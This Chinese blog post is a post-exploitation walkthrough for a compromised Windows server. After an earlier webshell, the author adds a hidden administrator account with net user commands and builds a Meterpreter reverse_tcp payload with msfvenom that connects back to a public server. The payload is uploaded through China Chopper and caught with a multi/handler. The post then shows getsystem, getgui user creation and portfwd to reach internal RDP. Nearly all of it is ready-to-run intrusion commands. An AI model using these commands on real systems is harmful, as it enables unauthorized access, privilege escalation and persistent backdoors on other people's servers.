美文网首页
getshell的进一步利用

getshell的进一步利用

作者: CSeroad | 来源:发表于2018-09-01 23:51 被阅读99次

在上次getshell之后,已经是system的权限啦。想要控制服务器。最直接的方式是添加用户,开3389。

添加用户

net  user  admintest 1234qwer..  /add

net  localgroup administrators admintest  /add

ok

想要远程也容易,只是这台服务器在内网。

192.168.1.18t

所以需要端口映射。

推荐文章:http://www.sqlsec.com/2018/03/cloud.html#more

打造一台外网meterpreter,使用msf马反弹shell,进行端口的转发。

msfvenom -p windows/x64/meterpreter/reverse_tcp  LHOST=xx.xx.xx.xx LPORT=2333 -f exe > road.exe

xx.xx.xx.xx为公网服务器,2333为公网出端口。

road.exe木马

将生成的msf马通过中国菜刀上传到内网服务器,触发反弹shell

use  exploit/multi/handle

set  payload  windows/x64/meterpreter/reverse_tcp

set lhost 127.0.0.1

run

ok meterpreter

meterpreter的命令简单应用

getuid 当前权限

getsystem  进行提取

run getgui -u xxxxx  -p  xxxxx  可以在目标机器上添加用户

portfwd add -l 3389  -r 192.168.1.18  -p  3389  将3389端口转发至本地

现在就可以远程连接本地的3389端口。

错误

出现身份错误。

解决方案:http://www.cnblogs.com/raswin/p/9018388.html

ok success

相关文章

网友评论

      本文标题:getshell的进一步利用

      本文链接:https://www.haomeiwen.com/subject/yokpwftx.html